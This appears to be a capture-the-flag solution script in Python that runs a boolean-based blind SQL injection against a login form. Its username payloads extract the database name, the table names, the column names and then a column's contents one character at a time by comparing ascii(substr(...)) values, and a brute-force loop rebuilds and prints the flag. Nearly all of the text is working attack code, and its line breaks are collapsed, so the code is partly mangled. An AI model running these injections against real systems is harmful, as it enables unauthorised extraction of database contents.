def test(num,asc): # data = {'username': 'admin\' and ascii(substr(database(),%s,1))>%s#'%(num,asc),'password':'111'} //sqli_database # data = {'username': 'admin\' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%s,1))>%s#'%(num,asc),'password':'111'}//news,user # data = {'username': 'admin\' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name=\'news\'),%s,1))>%s#'%(num,asc),'password':'111'}// data = {'username': 'admin\' and ascii(substr((select group_concat(kjafuibafuohnuvwnruniguankacbh) from sqli_database.news ),%s,1))>%s#'%(num,asc),'password':'111'} r = requests.post(url,data=data) if 'normal' in r.text: return 1 else: return 0
flag = '' for num in range(0,100): for asc in range(0,255): get = test(num,asc) if get == 0: flag += chr(asc) print(flag) break